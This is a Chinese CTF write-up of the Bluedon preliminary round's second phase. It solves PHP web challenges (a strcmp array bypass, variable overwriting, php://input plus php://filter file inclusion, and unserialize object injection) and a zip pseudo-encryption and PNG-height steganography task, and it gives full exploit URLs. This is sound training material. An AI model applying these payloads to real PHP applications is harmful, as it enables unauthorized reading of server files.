蓝盾初赛二阶段

因为在上课,做的时间较短

Web
签到题
签到
签到
限制了最大输入长度为3位
Burpsuite拦截输入个较大的数即可
flag
简单的题
有源码
蓝盾初赛二阶段_第1张图片
利用PHP的strcmp函数漏洞,输入一个数组即可
蓝盾初赛二阶段_第2张图片
送大礼
打开后是一大堆JSFUCK,扔进控制台里得到PHP源码
蓝盾初赛二阶段_第3张图片
看源码是变量覆盖
Payload:http://04c432a12784d2fb5ef431ec3366bc9a.yogeit.com:8080/?bdctf=&flag=
得到flag
flag
蓝盾管理员
给出了源码
蓝盾初赛二阶段_第4张图片
见过很多次的代码,一道经典题的一部分
用PHP输入流php://input满足if条件然后文件包含读取flag.php
Payload:
http://2a8da10821f39ea335a12fba77f7c3fc.yogeit.com:8080/?user=php://input&file=php://filter/read=convert.base64-encode/resource=flag.php
base64
Base64解码得到flag
flag
Bluedon用户
蓝盾初赛二阶段_第5张图片
一道经典题,前面那道题的完整版
同样的方法先读index.php的源码,再读class.php的源码
蓝盾初赛二阶段_第6张图片
蓝盾初赛二阶段_第7张图片
利用class.php的Read类和反序列化通过pass来读取fla9.php
payload:
http://11537c131de3f8b2060b36c0cf7eb083.yogeit.com:8080/?user=php://input&file=class.php&pass=O:4:%22Read%22:1:{s:4:%22file%22;s:8:%22f1a9.php%22;}
蓝盾初赛二阶段_第8张图片
WEB100-2

蓝盾初赛二阶段_第9张图片
有提示,输入?hint后看到源码
蓝盾初赛二阶段_第10张图片
Cookie传参并且反序列化后和变量KEY全等
将KEY的值序列化即可,但是这个%3B坑了很多人(我也被坑了,最后还是问的学长)
蓝盾初赛二阶段_第11张图片
除了这几道Web我还做了道隐写
像素隐藏
下载下来为rar文件,解压后里面有个zip文件,可以看到里面有张PNG图片,但是需要解压密码,题目没有任何关于密码的提示,猜测是zip伪加密
蓝盾初赛二阶段_第12张图片
010editor打开,搜索504B0102,将140009改为140000
蓝盾初赛二阶段_第13张图片
加密状态消失,解压出PNG图片
开始不是很明白题目名:“像素隐藏”什么意思,思考了一阵想起来做过的一道题
直接用TweakPNG打开,IHDR的crc验证报错了,应该是改了图片的宽或高
蓝盾初赛二阶段_第14张图片
查看下宽高的像素,直接改成500,得到flag
蓝盾初赛二阶段_第15张图片
就到这里为止了

你可能感兴趣的:(比赛经历)